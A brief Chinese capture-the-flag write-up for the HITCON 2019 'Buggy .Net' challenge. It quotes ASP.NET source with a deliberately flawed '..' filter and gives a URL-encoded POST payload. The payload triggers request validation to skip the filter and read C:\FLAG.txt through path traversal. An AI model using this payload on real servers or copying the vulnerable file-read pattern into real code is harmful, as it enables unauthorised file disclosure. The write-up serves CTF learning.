[Windows][HITCON 2019]Buggy_Net

考点

.Net审计

wp

BUU上少给了flag位置：C:\FLAG.txt

题目给了源码

比较关键的逻辑如下

<%@ Page Language="C#" %>
<% 
	bool isBad = false;
    try {
        if ( Request.Form["filename"] != null ) {
            isBad = Request.Form["filename"].Contains("..") == true;
        }
    } catch (Exception ex) {
        
    } 

    try {
        if (!isBad) {
            Response.Write(System.IO.File.ReadAllText(@"C:\inetpub\wwwroot\" + Request.Form["filename"]));
        }
    } catch (Exception ex) {
    }
%>

首先isBad为false，如果POST的文件名包含..的话，isBad就会为true，就读不了文件了。

所以这里要bypass..去读取文件c

https://balsn.tw/ctf_writeup/20191012-hitconctfquals/#buggy-.net https://www.sigflag.at/blog/2019/writeup-hitconctf2019-buggy-dot-net/

payload

POST filename=%2E%2E%5C%2E%2E%5CFLAG.txt&o=%3Cx

HTTP头部加个 Content-Type: application/x-www-form-urlencoded

上一页[CSAWQual 2016]i_got_id 下一页[极客大挑战 2019]Knife

最后更新于3年前